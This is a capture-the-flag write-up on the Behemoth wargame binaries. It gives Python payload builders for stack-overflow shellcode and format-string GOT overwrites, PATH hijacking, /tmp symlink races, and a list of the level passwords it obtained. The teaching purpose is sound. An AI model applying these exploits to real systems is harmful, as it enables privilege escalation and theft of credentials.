This report can be read both on this site and in its original report form. Reading the original report form is highly recommended because it is better formatted.
Behemoth
A look into the exploitation of vulnerable binaries
In contrast to Narnia, the source code for the binaries is not provided. Nevertheless, all eight binaries were successfully analyzed and exploited. Attack techniques covered in this report include shellcode injection, format string exploitation, and privilege escalation through the PATH environment variable. Some binaries were more of a reverse engineering exercise (Behemoth 5 and Behemoth 6, for example), while others involved buffer overflow and format string exploits. Behemoth 7, a buffer overflow challenge, showcases an interesting way of bypassing a shellcode filter.
The binaries were vulnerable mainly due to a lack of boundary checks and input validation. It is critical that the SETUID bits of these binaries be removed until the remediations in the Conclusion section have been applied. Below is the full listing of the passwords obtained from the compromised users:
Username     Password
behemoth0    behemoth0
behemoth1    aesebootiv
behemoth2    eimahquuof
behemoth3    nieteidiel
behemoth4    ietheishei
behemoth5    aizeeshing
behemoth6    mayiroeche
behemoth7    baquoxuafo
behemoth8    pheewij7Ae
Attack Narrative
The credentials for the first user, behemoth0, were given as behemoth0 (the credentials are behemoth0:behemoth0). The ssh service is open on port 2221, and this ssh session provided access for analyzing the binaries discussed in this report.
Behemoth 0
Running the strings command on the binary reveals some interesting strings:
However, trying any of these potential passwords results in an “Access denied..” message. Using ltrace, a library call tracer, the library calls made by the binary can be observed after a password is entered:
The binary compares the user input to the secret password using the strcmp (string compare) function. Trying the password eatmyshorts grants access to the next level:
Behemoth 1
Now with a shell as the behemoth1 user, we can maintain persistence by grabbing the password from the /etc/behemoth_pass directory.
Running the behemoth1 binary, the following output can be seen:
After downloading the binary and using ltrace, the following output is found:
This binary is a little more secure in the sense that the password is not exposed through strcmp. Before trying to reverse engineer this binary, it is worth checking for possible buffer overflow vulnerabilities. This can be done by sending a large input as follows:
The program was successfully crashed by sending a large input as can be seen from the “Segmentation fault” error. This is a strong indicator of a potential buffer overflow vulnerability.
Note how the cyclic function was used to help determine where the offset is
The output confirms the suspicion that this binary is vulnerable to a buffer overflow attack. The crash report at the bottom of the output shows that the program tried to return to the address 0x61617361, which is made up of bytes from the cyclic pattern. The offset can be calculated using cyclic -l as follows:
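The idea behind cyclic and cyclic -l can be sketched in Python. This is a minimal re-implementation, not the pwntools API itself, assuming pwntools' defaults: a de Bruijn sequence over the lowercase alphabet in which every 4-byte window is unique. Because each window occurs only once, the crashing EIP value pins down exactly how many bytes preceded it. The function names are hypothetical.

```python
import string
from itertools import islice


def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Yield a de Bruijn sequence in which every n-character window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (comparable to `cyclic 200`)."""
    return "".join(islice(de_bruijn(n=n), length)).encode()


def cyclic_find(eip_value, length=1000, n=4):
    """Offset of a crashing EIP value within the pattern (comparable to `cyclic -l`).

    x86 is little-endian, so the register value is converted back into the
    byte order in which the pattern was laid out in memory.
    """
    needle = eip_value.to_bytes(n, "little")
    return cyclic(length, n).find(needle)


print(cyclic(20))               # b'aaaabaaacaaadaaaeaaa'
print(cyclic_find(0x61617361))  # 71, since 0x61617361 is the bytes "asaa"
```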
The offset is the number of bytes the input can contain before it overwrites the saved return address, which is loaded into the instruction pointer (EIP, the register that holds the address of the next instruction to execute) when the function returns. Observe from the hex addresses that this is a 32-bit binary. The file command can also be used to verify this:
This binary is not stripped, meaning its symbols[1] (such as function names) are still available. Additionally, the binary’s security features can be analyzed with the checksec command:
Since this binary has NX (non-executable stack) disabled, shellcode written onto the stack can be executed (provided that the payload is formatted correctly). With the knowledge that arbitrary code can be executed and that the instruction pointer can be controlled, the binary can be exploited using shellcode.
Note how the return address was successfully controlled (42 is the hex value for B).
For the sake of learning more about binary exploitation, I will go over two different methods of pwning:
Method 1
We can create a payload that has the following structure:
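The payload layout for this method (junk, return address, NOP sled, shellcode) can be sketched in Python. This assumes an offset of 71 bytes to the saved return address (what cyclic -l reports for 0x61617361); the return address and sled length are hypothetical values, and the shellcode is a placeholder to be replaced with the /bin/sh shellcode[2].

```python
import struct

OFFSET = 71                # bytes before the saved return address (cyclic -l 0x61617361)
RET_ADDR = 0xffffd5f0      # hypothetical: any address that lands inside the NOP sled
SLED_LEN = 100             # assumed sled length
SHELLCODE = b"\xcc" * 23   # placeholder (INT3 bytes); substitute the real shellcode


def build_payload(offset, ret_addr, sled_len, shellcode):
    """junk | return address (little-endian) | NOP sled | shellcode"""
    return (b"A" * offset
            + struct.pack("<I", ret_addr)
            + b"\x90" * sled_len
            + shellcode)


payload = build_payload(OFFSET, RET_ADDR, SLED_LEN, SHELLCODE)
```

The resulting bytes could be written with sys.stdout.buffer.write and piped into the binary.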
This payload can then be fed to the binary, which will execute the shellcode. There are many kinds of shellcode that could be used; here, a simple /bin/sh shellcode[2], which returns a shell upon execution, is used. The next task is to determine the address at which the shellcode will be located.
POC
Note A is 41, B is 42, and C is 43 in hex
Looking at the memory at the esp register (the stack pointer, which points to the top of the stack), observe that the shellcode (in this case the 0x43 bytes) starts at the second column of the row labeled 0xffffd03c. Since each column corresponds to 4 bytes, the address of the shellcode is 0xffffd03c + 4, which equals 0xffffd040.
Shellcode Execution
With an understanding of how the buffer overflow works, we can now continue with exploiting the behemoth1 binary on the target system.
Now that the binary’s memory has been flooded, the memory around the ESP register can be examined to see which address marks the start of the shellcode:
The overwritten return address (the value that ends up in EIP) is stored at 0xffffd5bc. It is followed by a sequence of NOPs, and the shellcode most likely begins at 0xffffd61c + 8. Thus, any return address between 0xffffd5bc + 4 and 0xffffd61c + 8 should land in the NOP sled and slide into the shellcode.
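The sled bounds implied by these GDB observations can be worked out with a few lines of Python. Aiming near the middle of the sled, rather than at its edge, leaves room for the stack to shift slightly outside GDB (for example because the environment differs). The values are the ones quoted above; the midpoint choice is an illustrative assumption, not the address the report ultimately used.

```python
# Values read from the x/wx stack dump in GDB, as quoted in the report
RET_SLOT = 0xffffd5bc              # where the overwritten return address is stored
SHELLCODE_START = 0xffffd61c + 8   # first byte of the shellcode

sled_start = RET_SLOT + 4          # first NOP right after the return address
sled_end = SHELLCODE_START         # the sled ends where the shellcode begins
sled_size = sled_end - sled_start
middle = sled_start + sled_size // 2

print(hex(sled_start), hex(sled_end), sled_size, hex(middle))
```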
It is important to note that piping this malicious payload into the binary did not produce a Segmentation Fault error; instead, an Illegal Instruction error was printed. This error is raised when the CPU tries to execute bytes that do not form a valid instruction, for example because execution jumped into plain data or into the middle of a multi-byte opcode (which is why it is also called an illegal opcode error). This indicates that the payload most likely works, but the return address needs to be tweaked so that it points to an address from which the shellcode is decoded correctly. After slightly decrementing the address a few times, the following is found:
Note how now there is no error displayed
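The program is most likely executing the shellcode, but no shell is received. This is most likely because the pipe closes as soon as the payload has been written, so the spawned shell reads end-of-file on stdin and exits immediately. By appending ;cat - to the command that generates the payload, stdin stays open and terminal input is forwarded to the shell, and the exploit works as intended: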
Method 2
Alternatively, it is possible to exploit this binary by using environment variables.
We can create a C file that takes our environment variable and uses it for the targeted binary.
After compiling the program with gcc, it can be executed to inject the shellcode into the environment variable and find where that variable is located in memory:
Seeing that the shellcode is at 0xffffddd3, the payload can be constructed to point to this address:
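With the shellcode living in the environment, the overflow itself only needs junk followed by that address. A minimal sketch, assuming an offset of 71 bytes to the saved return address (what cyclic -l reports for 0x61617361); the function name is hypothetical, and the address is only valid for the environment in which it was measured.

```python
import struct

OFFSET = 71              # bytes before the saved return address
ENV_ADDR = 0xffffddd3    # address of the shellcode variable, as found above


def env_payload(offset, env_addr):
    """Junk up to the saved return address, then the environment variable's address."""
    return b"A" * offset + struct.pack("<I", env_addr)


payload = env_payload(OFFSET, ENV_ADDR)
```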
Behemoth 2
As the behemoth2 user, the behemoth2 binary can now be executed.
Binary Analysis
Behavior
After executing the binary, the program simply touches a file and then hangs:
Since the binary runs a shell command, the system function is most likely being called within the program.
Ghidra
After downloading the binary onto the attack box, this binary can be further analyzed within Ghidra:
Toward the top of the program, the sprintf function is called to write the string “touch %d” into the local_2c variable (with %d replaced by the id of this process). It is essential to note that touch is invoked without its full path (i.e. /usr/bin/touch).
Furthermore, system is called twice: once inside the if statement and once outside it, following a sleep of 2000 seconds. This sleep call is responsible for the hang observed after executing the binary. The first call to system runs the touch command. The second call again uses the local_2c variable, but only after it has been set to 0x20746163. Converting the bytes 20 74 61 63 into ASCII results in “ tac”.
Because this binary is little-endian (LSB), these bytes are stored in memory in reverse order, so the string actually reads “cat ”. Thus, the program first touches a file and then cats it 2000 seconds later.
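The byte-order reasoning can be checked directly in Python: reading the constant's hex digits left to right gives “ tac”, while storing it as a little-endian 32-bit integer (as x86 does) gives “cat ”. This is only an illustration of the decoding step.

```python
import struct

value = 0x20746163                         # constant Ghidra shows being stored into local_2c
as_written = value.to_bytes(4, "big")      # hex digits read left to right
in_memory = struct.pack("<I", value)       # actual byte order on little-endian x86
print(as_written, in_memory)               # b' tac' b'cat '
```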
Binary Exploitation
This binary has multiple vulnerabilities, and each method of exploitation is described below:
Path Privesc (Touch)
Since this binary executes the touch command without its full path, a file called touch can be created that executes /bin/bash:
After creating this file with the aforementioned contents, the PATH environment variable can be updated to prioritize the current directory over all other directories:
Now, upon executing the behemoth2 binary, the call to touch will resolve to the newly created touch file:
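system hands the command string to /bin/sh, which resolves a bare name such as touch by searching the PATH directories from left to right. Python's shutil.which performs the same left-to-right lookup, so it serves here as a stand-in showing why prepending an attacker-controlled directory hijacks the command. A sketch only: the helper name shadow_command and the script contents are hypothetical (the report's script runs /bin/bash).

```python
import os
import shutil
import stat
import tempfile


def shadow_command(name, directory):
    """Hypothetical helper: drop an executable script called `name` into `directory`."""
    path = os.path.join(directory, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho hijacked\n")   # the report's script runs /bin/bash instead
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


with tempfile.TemporaryDirectory() as attacker_dir:
    fake_touch = shadow_command("touch", attacker_dir)
    # Equivalent of `export PATH=<dir>:$PATH`: the attacker's directory is searched first
    search_path = attacker_dir + os.pathsep + os.environ.get("PATH", "")
    hijacked = shutil.which("touch", path=search_path) == fake_touch

print(hijacked)
```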
Path Privesc (Cat)
The same methodology used for the touch command can be used for the cat command. As seen from the analysis, the cat command is also being called without using its full path:
This way of escalating privileges takes longer than the aforementioned one because a wait of 2000 seconds is necessary before cat gets executed.
Symbolic Link
This binary could still be abused even if cat and touch were called using their full paths. A symbolic link to the behemoth3 password file can be created so that the cat command reads the password of the behemoth3 user. The name of the link must correspond to the id of the process. When cat reads the link, it follows it to the credentials of behemoth3, and the password of the user is printed to stdout:
Once the behemoth2 binary was executed, an error stated that touch could not create the file 10216: the binary runs as behemoth3, which does not have permission to create files in a directory owned by behemoth2. The error leaks the file name, so a symbolic link with that name can be created before the cat command gets executed (the window for creating it is 2000 seconds).
After logging into another session as the behemoth2 user, a symbolic link corresponding to 10216 can be created:
Note that this file is pointing to the password of the behemoth3 user.
After waiting for 2000 seconds, the password of the behemoth3 user gets printed out:
Behemoth 3
After successfully abusing the behemoth2 binary, the next challenge is behemoth3.
Binary Analysis
We can begin the analysis by downloading the target binary onto the attack box and running the checksec command against it:
From the results of checksec and file, note that the binary has essentially no protections: every mitigation reported by checksec is disabled. Additionally, the file is not stripped, so its symbols will be available.
Behavior
When executing the program, we are asked to provide an identification:
After inputting a large number of A’s (in this example 500 A’s were used), the program prints out a truncated version of the string:
Despite 500 A’s being passed into the buffer, only 200 A’s were printed out. Ghidra can be used to further understand how this binary works:
Ghidra
Ghidra translated the assembly code of the main function into the following:
A variable called local_cc, a char array of 200 bytes, is declared. Afterwards, fgets is called with a size limit of 200 bytes, so the input cannot overflow local_cc, and therefore this binary is not vulnerable to a buffer overflow exploit. However, the user input (local_cc) is passed directly to printf as its format argument without any sanitization. Consequently, the program is likely vulnerable to a format string exploit[3].
Discovery of Format String Vulnerability
This can be verified by passing a format string into the local_cc variable:
Inputting %x into the buffer printed a7825 (note that %x is the format specifier for an unsigned int printed as a hexadecimal number[4]). Read as little-endian bytes, 0x000a7825 is 25 78 0a, i.e. the characters “%x\n” themselves, so printf is reading values from the stack, starting with the input buffer. Whenever the binary is given format specifiers as input, it leaks memory from the stack.
This vulnerability can be abused to write to memory by using the %n format specifier, which stores the number of characters printed so far into the int pointed to by its corresponding argument. If that argument is the address of a function pointer used by the binary (such as a GOT entry), the pointer can be overwritten to point to shellcode. This can result in the execution of arbitrary code.
Memory Addresses of Useful Functions
The objdump command can be used to determine the addresses of the GOT entries for the functions used by the binary:
The output lists three functions (printf, fgets, and puts). However, the fgets and printf entries should not be overwritten, as these functions must work properly to accept and process the malicious payload. This leaves puts, which is called after the vulnerable printf, as the only candidate from the objdump output to be overwritten.
Overwriting Puts
Before being able to overwrite the memory address of puts, the user input’s location within the stack must first be determined:
When inputting AAAA followed by a %x format specifier, the hexadecimal value of the A’s (41414141) is printed immediately. This means that the user input is the first value that printf reads from the stack. Throughout this level, the malicious input will be written to a file so that the payload can be constructed with the help of GDB:
Constructing Payload With GDB
Using the address of puts found by the objdump command, the following payload can be constructed:
The \xac\x97\x04\x08 string corresponds to the address of the puts GOT entry (0x080497ac) in little-endian form. It is followed by a %x specifier padded to a width of 100 characters, which prints a stack value in hex. This type of padding is extremely useful for controlling the value that %n writes.
When this payload is passed to the binary within GDB, a segmentation fault occurs; however, the value in the puts GOT entry is not the expected one:
Observe that the value is 0x08048356, which appears to be the entry's original value, instead of a small number. The written value should equal the number of characters printed before %n, which here would be 4 (for the address of puts) + 100 (the padded %x) = 104 in decimal, or 0x68 in hex. The problem is that %x consumes the first word of the buffer, which is the address itself, so %n takes the following word as its pointer. Prepending AAAA to the payload gives %x a word to consume, so %n receives the puts address and the entry is successfully overwritten (with 108, or 0x6c, since AAAA adds four more printed characters):
Exploit Development
With the puts entry successfully overwritten, the next step is to control the value written to it. Currently, it holds 0x6c, but it must point to shellcode for arbitrary code to be executed. The methodology used here overwrites the puts GOT entry two bytes at a time. Thus, the final exploit will have the following structure:
Note that there are two addresses within this payload: one is the address of the puts entry, and the other is that address + 2, so that the value can be written two bytes at a time. This also means that two %x specifiers must be used along with two %n’s. Additionally, a 23-byte shellcode[5] will be used.
Controlling Puts Address
To begin the exploit, the puts address must first be controlled with the help of format string padding.
A NOP sled of 100 bytes is placed before the 23-byte shellcode (denoted by the placeholder ‘S’). Following the shellcode, the %x specifier is padded to 100 characters, so the first %n writes 16 (the four header words) + 100 (NOPs) + 23 (shellcode) + 100 (padding) = 239, i.e. 0xef, to the puts entry:
A segmentation fault occurred as expected, because puts now jumps to 0xef, an address that cannot be accessed. Ideally, the puts entry should point somewhere within the NOP sled. Since the sled is 100 bytes long, multiple addresses would work for this exploit:
The exploit begins at address 0xffffd4d8 + 8 (as can be seen from 0x41414141, which is AAAA), followed by the address of puts and another four A’s. These are followed by puts + 2, and finally the NOP sled begins at 0xffffd4e8 + 8. For the purposes of this exploit, the address 0xffffd510 was chosen (the value targeted by the padding calculations that follow). In decimal, this value is 4294956304, which in theory could be written with a single %n by printing about 4294956304 characters. In practice, however, this is impractical, since printing this many bytes to stdout would take a very long time. As mentioned in Exploit Development, this can be avoided by using two %n specifiers that write to two addresses two bytes apart.
The largest value for each half of the address is 16^4 - 1, which is 65535, far less than the 4294956304 characters previously mentioned. For comparison, the largest value representable in 32 bits is 16^8 - 1, which is 4294967295 or 0xffffffff.
A value of 0xef was written to the puts entry; however, a value of 0xd510 was desired for the lower two bytes. The padding necessary to achieve this value can be determined with the following calculation:
new_padding = desired_output - current_output + current_padding
Thus, a padding of 54405 (0xd510 - 0xef + 100 = 54544 - 239 + 100) is needed to output 0xd510:
The lower two bytes were successfully overwritten to 0xd510. The same method can be used to overwrite the two most significant bytes:
Note that a padding of 100 was arbitrarily picked so as to perform the following calculations:
After inputting a padding of 100 for the two most significant bytes, the resulting value was 0xd574 (0xd510 + 100):
The correct padding can subsequently be calculated as 0xffff - 0xd574 + 100 = 65535 - 54644 + 100 = 10991:
Therefore, the final exploit will look like the following:
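The two-write arithmetic can be checked with a short Python sketch. It assumes the layout described in this section (AAAA, puts, AAAA, puts + 2, a 100-byte NOP sled, a 23-byte shellcode, then two padded %x/%n pairs) and models each %n as a 4-byte little-endian store. The shellcode is a placeholder and the helper names are hypothetical. It also assumes each %x prints exactly its field width, which holds here because 41414141 is only 8 characters long.

```python
import struct

PUTS_GOT = 0x080497ac      # puts entry reported by objdump
TARGET = 0xffffd510        # chosen address inside the NOP sled
SLED = b"\x90" * 100
SHELLCODE = b"\xcc" * 23   # placeholder (INT3 bytes) for the 23-byte shellcode [5]
HEADER_LEN = 16            # four 4-byte words: AAAA, puts, AAAA, puts + 2


def new_padding(desired_output, current_output, current_padding):
    """desired_output - current_output + current_padding, as used in the report."""
    return desired_output - current_output + current_padding


def build_payload(low_pad, high_pad):
    # Stack words are consumed in order: %x <- AAAA, %n <- puts, %x <- AAAA, %n <- puts + 2
    header = (b"AAAA" + struct.pack("<I", PUTS_GOT)
              + b"AAAA" + struct.pack("<I", PUTS_GOT + 2))
    fmt = f"%{low_pad}x%n%{high_pad}x%n".encode()
    return header + SLED + SHELLCODE + fmt


def simulate_got(low_count, high_count):
    """Model the two 4-byte %n stores on the GOT entry plus the 2 bytes after it."""
    mem = bytearray(6)
    mem[0:4] = struct.pack("<I", low_count)    # first %n writes at puts
    mem[2:6] = struct.pack("<I", high_count)   # second %n at puts + 2 replaces the top half
    return struct.unpack("<I", bytes(mem[0:4]))[0]


# Trial run with %100x gave 0xef; correct it so the first %n writes 0xd510.
low_pad = new_padding(TARGET & 0xffff, 0xef, 100)
# Trial run with %100x for the second write gave 0xd574; correct it to 0xffff.
high_pad = new_padding(TARGET >> 16, 0xd574, 100)

first = HEADER_LEN + len(SLED) + len(SHELLCODE) + low_pad   # count at the first %n
second = first + high_pad                                   # count at the second %n
print(low_pad, high_pad, hex(simulate_got(first, second)))  # 54405 10991 0xffffd510
```

The resulting payload is 157 bytes long, which fits within the 200-byte fgets limit.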
Popping a Shell
Note that the S placeholder was replaced with the actual shellcode. Executing this payload within GDB causes the debugged process to exit abruptly due to the execution of /bin/dash:
When this payload is piped straight into the binary without GDB, a shell is returned:
Note that cat - is appended to the payload. This is an essential part of the exploit: it keeps stdin open so that the spawned shell can keep reading commands from the terminal. Without cat, the shell reads end-of-file and the process exits immediately without errors.
Incidentally, a /bin/bash shellcode[6] was used when first exploiting this binary, but it did not work outside GDB for unknown reasons. When an exploit does not work as intended, it can be beneficial to try a different shellcode to see if that resolves the problem.
Behemoth 4
With the necessary permissions obtained by compromising the behemoth4 user, the behemoth4 binary can be executed.
Binary Analysis
Before exploiting the binary, it is necessary to understand how it works.
Behavior
Executing the binary does not result in anything out of the ordinary:
The program simply prints out “PID not found!” and exits immediately.
Ghidra
Within Ghidra, we can get a further look at how the program is getting the PID, and what it does with it:
The program starts by declaring a few variables. The getpid function is called, and its output is stored in local_14. This PID is then appended to /tmp/ to build a path, which is stored in local_30. Afterwards, local_18 is set to the result of opening that path, i.e. a file in /tmp whose name is the id of the binary’s process. If the file does not exist, “PID not found!” is printed. Otherwise, the contents of the file are read out using the getchar function within a while loop.
Binary Exploitation
The problem with this program is that it trusts whatever file exists at /tmp/<pid>. Since /tmp is writable by every user, a symbolic link can be placed there in advance to make the program read the password file of the behemoth5 user.
Symbolic Link Attack
Since the PID of the binary cannot easily be determined before executing the program, a bash script can be used to create many files corresponding to possible PIDs. Before creating this bash script, the approximate PID of the binary must first be found:
This process was assigned the ID 22928, and it therefore looked for a file called 22928 within the /tmp directory. Since PIDs are generally assigned in increasing order, the PID of the next execution of the binary should be greater than 22928 and is likely less than 30000:
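The report uses a bash script for this step; the same symlink spray can be sketched in Python. The helper name spray_pid_links is hypothetical, and the demonstration runs in a scratch directory with a dummy file instead of /tmp and the real password file. It shows that opening a file named after a PID transparently follows the link to its target.

```python
import os
import tempfile


def spray_pid_links(target, directory, start, stop):
    """Hypothetical helper: create directory/<pid> -> target for each PID in [start, stop).

    Names that already exist are skipped rather than overwritten.
    """
    created = 0
    for pid in range(start, stop):
        try:
            os.symlink(target, os.path.join(directory, str(pid)))
            created += 1
        except FileExistsError:
            pass
    return created


# Self-contained demonstration in a scratch directory instead of /tmp
with tempfile.TemporaryDirectory() as scratch:
    secret = os.path.join(scratch, "secret")      # stands in for the password file
    with open(secret, "w") as f:
        f.write("not-the-real-password\n")
    links = os.path.join(scratch, "pids")
    os.mkdir(links)
    demo_created = spray_pid_links(secret, links, 100, 110)
    # Opening "<pid>" follows the symlink, just as the binary's open call would
    with open(os.path.join(links, "105")) as f:
        demo_contents = f.read()

print(demo_created, demo_contents.strip())
```

On the target, the equivalent call would be along the lines of spray_pid_links("/etc/behemoth_pass/behemoth5", "/tmp", 22929, 30000).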
Now, when the binary is executed, it will read the contents of behemoth5’s password:
Behemoth 5
By first logging into the account through ssh with the credentials found in Behemoth 4, the behemoth5 binary can be executed.
Binary Analysis
When executing the binary, nothing out of the ordinary occurs. The binary simply exits without anything printing out to stdout. After downloading the binary onto the attack box, Ghidra could be utilized to help in analyzing the binary.
Ghidra
After many variables are declared, the password for the behemoth6 user is read into the program. Afterwards, the gethostbyname function is called with the argument “localhost”. Shortly afterwards, the socket function is called with the arguments (2, 2, 0). Observe the following source code and the corresponding Ghidra output:
(Figures: three test programs, Source1 to Source3, calling socket, and the corresponding Ghidra output, Ghidra1 to Ghidra3.)
The socket arguments of Ghidra3 are identical to the arguments seen in behemoth5. Therefore, the arguments in the behemoth5 binary correspond to IPv4 (AF_INET), UDP (SOCK_DGRAM), and the default protocol, respectively[7].
After the call to socket, iVar3 is set to 1337 before sendto is called. From these lines of code, it can be discerned that the password of the behemoth6 user is sent as a UDP datagram to localhost on port 1337.
Catching Behemoth6 Password Through UDP
Before executing the binary, another session must be opened so that a UDP listener can be set up on port 1337:
behemoth5@behemoth:~$ nc -lup 1337 localhost
The -u flag specifies UDP mode, -p is for specifying a port, and -l tells nc to listen for inbound connections
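For reference, a Python stand-in for the nc listener is sketched below. It is not the binary's code; it simply binds a UDP socket with the same constants the decompiled socket(2, 2, 0) call uses (on Linux, AF_INET is 2 and SOCK_DGRAM is 2) and returns the first datagram received. The function names are hypothetical, and loopback_demo only exercises the listener by sending itself a message on an ephemeral port.

```python
import socket


def open_listener(host="127.0.0.1", port=1337):
    """Bind a UDP socket, comparable to `nc -lup 1337`."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    return sock


def receive_once(sock, bufsize=1024, timeout=None):
    """Return the payload of the next datagram (for behemoth5, the password)."""
    sock.settimeout(timeout)
    data, _sender = sock.recvfrom(bufsize)
    return data


def loopback_demo(message):
    """Send `message` to a throwaway listener on an ephemeral port and read it back."""
    with open_listener(port=0) as listener:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
            sender.sendto(message, listener.getsockname())
        return receive_once(listener, timeout=2.0)
```

On the target, receive_once(open_listener()) would block until behemoth5 sends its datagram.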
After executing the binary, the password of the behemoth6 user can be seen on stdout:
Note that the blue line is a result of using tmux[8]; it represents the divider between different panes
This challenge was more of a reverse engineering exercise, but it is good practice for developing the skill of understanding the functionality of a binary.
Behemoth 6
After logging in as the behemoth6 user and executing the behemoth6 binary, the following output is seen:
Furthermore, running ls on the /behemoth directory reveals another interesting file possibly related to behemoth6:
That file is called behemoth6_reader, and it might be used by the behemoth6 binary. After downloading both binaries onto the attack box, they can be analyzed with the help of Ghidra.
Ghidra
Ghidra translated the assembly code found for each binary into the following:
The code on the left was produced from the behemoth6 binary, while the code on the right is from behemoth6_reader. Looking at the code for behemoth6_reader, a file named shellcode.txt is expected; however, its contents are never printed. If shellcode.txt exists, a small sanitization check is performed on it: if the file contains the byte 0xb, the program immediately exits. Notably, 0xb (11) is the execve system call number on 32-bit x86 Linux, so this check rejects typical execve shellcode.
In short, the program executes the contents of shellcode.txt as machine code. This, however, will not directly result in a privileged shell, because the SETUID bit is not set on behemoth6_reader. Rather, the behemoth6 binary has the SETUID bit, so what matters is how the shellcode influences behemoth6's interaction with behemoth6_reader.
Looking at the code for behemoth6, observe that behemoth6_reader is run using the popen function in read mode, and the resulting stream is stored in the __stream variable. Data read from this stream is stored in __s1, which is compared against the string ‘HelloKitty’ using strcmp. If the output matches the string, a /bin/sh shell is spawned.
Abusing popen()
The output of popen is whatever behemoth6_reader prints. Consequently, if behemoth6_reader executes shellcode that prints ‘HelloKitty’, a shell will be returned. Shellcode that performs this operation is already available online, and the following shellcode was used[9]:
The code above prints whatever string follows it (the string must be appended as raw bytes). This code, followed by ‘HelloKitty’ encoded as bytes, will result in a successful string comparison. To facilitate the conversion between ASCII and shellcode bytes, a conversion table[10] was used.
ASCII: HelloKitty
Shellcode: \x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79
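The conversion table lookup, and the reader's 0xb check described above, can be reproduced in a few lines of Python. This is a sketch only; to_escaped and passes_reader_filter are hypothetical helper names, and the filter function models only the single byte check attributed to behemoth6_reader.

```python
def to_escaped(text):
    """Render ASCII text as \\xNN escapes, ready to append to shellcode."""
    return "".join(f"\\x{b:02x}" for b in text.encode("ascii"))


def passes_reader_filter(payload):
    """Model of the behemoth6_reader check: any 0x0b byte causes an exit."""
    return b"\x0b" not in payload


print(to_escaped("HelloKitty"))   # \x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79
```

Running passes_reader_filter over the complete contents of shellcode.txt before copying it to the target is a quick way to catch an accidental 0x0b byte.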
After creating a directory in /tmp (so that files can be created), the following code was written into shellcode.txt:
Now when the behemoth6 binary is executed, behemoth6_reader (launched via popen) runs the contents of shellcode.txt, making it print HelloKitty. As a result, strcmp reports a match, and a /bin/sh shell is returned:
Behemoth 7
After successfully exploiting the behemoth6 binary, we are left with the final challenge of exploiting the behemoth7 binary.
Binary Analysis
Before analysing the binary with tools such as GDB and Ghidra, it is advisable to execute it first to observe its behavior.
Behavior
Upon executing the binary, nothing conspicuous occurs. The binary immediately exits after execution without printing anything to stdout.
Ghidra
After downloading the binary onto the attack box, the binary can be analyzed with the help of Ghidra. Using Ghidra, the assembly code of the binary was converted to the following code:
At the very top of the code, it can be seen that the main function takes three parameters. These most likely correspond to argc[11], argv, and envp, so the input is taken from the command-line arguments. At the top of the main function are variable declarations, among them local_210 with 512 bytes allocated to it. Toward the middle of the main function is a while loop located within an if statement. Inside the while loop is an if statement which, when its condition is true, prints the following:
Therefore, there is likely a filter that rejects non-alphanumeric characters[12]. This would limit the shellcode that could be used if the EIP register could not be overwritten. However, there do not seem to be any boundary checks in the code, so the EIP register should be overwritable. This can be verified by passing a large number of bytes to the program:
The EIP register was successfully overwritten, as can be seen from the value of the instruction pointer (0x41414141, which is AAAA in ASCII). Since the filter presumably does not inspect the bytes placed beyond the overwritten return address (which the working exploit confirms), the shellcode used for exploiting this binary does not have to consist of alphanumeric characters.
Constructing Payload
The payload will consist of junk bytes up to the EIP offset, followed by the address of the shellcode, then a NOP sled, and finally the shellcode itself.
Calculating EIP Offset
To begin the construction of the exploit, the EIP offset must first be calculated:
The offset was calculated as 528 bytes, so 528 bytes of junk must be passed to the binary before the EIP register can be controlled.
Shellcode Address
The next step is to determine the address of the shellcode[13]. This can easily be analyzed within GDB:
The bytes after the overwritten EIP begin at 0xffffd2e8 + 8, which is 0xffffd2f0. Following these junk bytes, the shellcode starts at 0xffffd358 + 8, which is 0xffffd360. Therefore, EIP should be overwritten with 0xffffd360.
Final Payload
With the knowledge of the EIP offset and the shellcode address, the final payload can now be constructed:
It is important to note that ‘A’ is repeated 112 times (0xffffd360 - 0xffffd2f0 = 0x70 = 112) so that 0x41 bytes do not spill into the shellcode portion of memory. The value 112 is not strictly necessary, but it should be a multiple of 4 to prevent spilling into memory addresses that only the shellcode should occupy.
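The final layout (528 bytes of junk, the shellcode address, 112 filler bytes, then the shellcode) can be sketched in Python. The offset and addresses are the ones found above; the shellcode is a placeholder of hypothetical length. Because the payload is passed as a command-line argument, it must not contain null bytes.

```python
import struct

OFFSET = 528                # junk bytes before the saved return address
AFTER_RET = 0xffffd2f0      # first byte after the overwritten return address (from GDB)
FILLER = 112                # 'A' bytes between the return address and the shellcode
SHELLCODE = b"\xcc" * 23    # placeholder (INT3 bytes); substitute the real shellcode [13]

shellcode_addr = AFTER_RET + FILLER   # the value EIP must take

payload = (b"A" * OFFSET
           + struct.pack("<I", shellcode_addr)
           + b"A" * FILLER
           + SHELLCODE)
```

On POSIX systems, subprocess.run accepts bytes arguments, so something like subprocess.run(["/behemoth/behemoth7", payload]) could deliver it, although the stack addresses may differ slightly outside GDB.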
The payload works in GDB as can be seen from /bin/bash being executed:
When trying this payload outside of GDB, a shell is successfully popped, and the final local user is compromised:
Conclusion
Every binary tested was successfully exploited. Several binaries that should not otherwise have been exploitable turned out to be vulnerable because they called sensitive system commands (in particular /bin/sh). This enabled the horizontal privilege escalation in Behemoth 0 and Behemoth 6.
Each binary had its own vulnerabilities, ranging from format string exploits to buffer overflows and privilege escalation via the PATH environment variable. The following remediations should be strongly considered:
- Perform boundary checks on user input
  - Multiple binaries were vulnerable due to the lack of boundary checks
  - Shellcode injection was possible in many binaries due to this lack of validation
  - Poor shellcode filtering can be bypassed if EIP can be overwritten, as seen in Behemoth 7
- Filter user input
  - Malicious shellcode could easily be injected into multiple binaries due to the lack of input validation (although shellcode can be encoded, validation would nevertheless mitigate these kinds of attacks)
- Never run sensitive system commands unless absolutely necessary
